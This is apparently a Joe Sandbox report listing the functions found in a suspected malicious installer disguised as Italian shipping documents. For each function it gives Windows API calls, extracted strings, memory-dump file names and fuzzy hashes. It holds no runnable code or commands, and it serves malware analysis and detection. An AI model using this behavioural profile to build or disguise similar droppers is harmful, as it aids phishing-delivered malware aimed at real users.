Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

Exec, xrefs: 00404872
N, xrefs: 00404831

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Exec$N
API String ID: 3103080414-17853963
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

%ls=%ls, xrefs: 00406212
[Rename], xrefs: 00406286, 00406298

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 73A91B67 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83processstringsynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000400), ref: 73A91B96
lstrcpynW.KERNEL32(?,00000000), ref: 73A91BA4
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 73A91C03
WaitForSingleObject.KERNEL32(?,000000FF), ref: 73A91C15
GetExitCodeProcess.KERNEL32(?,?), ref: 73A91C22
CloseHandle.KERNEL32(?), ref: 73A91C31
CloseHandle.KERNEL32(?), ref: 73A91C36
ExitProcess.KERNEL32 ref: 73A91C3B
ExitProcess.KERNEL32 ref: 73A91C46

Strings

", xrefs: 73A91BAA
D, xrefs: 73A91B8A

Memory Dump Source

Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true

Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
String ID: "$D
API String ID: 2956148522-1154559923
Opcode ID: 5812b78d80b5e0dae5f6bd2e8aeb8285f107c6363ca912792c99f65c677e6e66
Instruction ID: 0a6a33dbaef4f24621f3aa597d46202550b082c4419b972abf90a40efdcc97f4
Opcode Fuzzy Hash: 5812b78d80b5e0dae5f6bd2e8aeb8285f107c6363ca912792c99f65c677e6e66
Instruction Fuzzy Hash: 9921A37280011DAEEF11AB95CD4AFDF7BBDEB04311F610466E20BB2094EB700E49CBA1

Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00406849
*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1934191174
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 73A91987 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,73A910E0), ref: 73A91990
GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,73A910E0), ref: 73A9199E
GetProcAddress.KERNEL32(00000000,?), ref: 73A919BD
GetProcAddress.KERNEL32(00000000,?), ref: 73A919E6

Strings

IsWow64Process2, xrefs: 73A919A4
KERNEL32, xrefs: 73A91996

Memory Dump Source

Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true

Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: IsWow64Process2$KERNEL32
API String ID: 977827838-1019154776
Opcode ID: f16add58ff2ace744c0c1c2a29421b021bce02541329640d67da93bd7d613d29
Instruction ID: 87428dc0ca2c9901243a72cfd1b7e7abacedb789e2761fdc1b712eb6bc26f6d4
Opcode Fuzzy Hash: f16add58ff2ace744c0c1c2a29421b021bce02541329640d67da93bd7d613d29
Instruction Fuzzy Hash: 0F014076D00219BEEB01ABA58C46BAF7BFCDF08150F014456A912F2185EB75DA05C7A4

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(0002F000,00000064,000B6BC8), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

